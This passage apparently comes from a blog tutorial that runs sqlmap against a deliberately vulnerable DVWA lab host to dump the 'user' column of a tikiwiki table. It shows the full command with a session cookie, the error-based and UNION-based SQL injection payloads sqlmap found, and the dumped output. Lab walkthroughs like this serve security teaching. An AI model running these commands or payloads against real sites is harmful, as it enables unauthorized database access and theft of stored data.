| time_online | int(10) |
| user | varchar(40) |
| votes | int(10) |
+-------------------+-------------+
[03:49:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
[*] shutting down at 03:49:04
Now we continue with the user dump, here we would like to see a user that exists in the tables, do the tiki_pages as before, see the following:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ee66c40d056596d8e02129bd8ab3f095" -D tikiwiki -T tiki_pages -C user --dump
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:01:23
[05:01:23] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[05:01:23] [INFO] resuming injection data from session file
[05:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:01:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---
[05:01:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:01:27] [INFO] fetching columns LIKE 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] fetching entries of column(s) 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] analyzing table dump for possible password hashes
Database: tikiwiki
Table: tiki_pages
[1 entry]
+-------+
| user |
+-------+
| admin |
+-------+
[05:01:27] [INFO] Table 'tikiwiki.tiki_pages' dumped to CSV file '/pentest/database/sqlmap/output/192.168.56.101/dump/tikiwiki/tiki_pages.csv'
[05:01:27] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
[*] shutting down at 05:01:27
No comments:
Post a Comment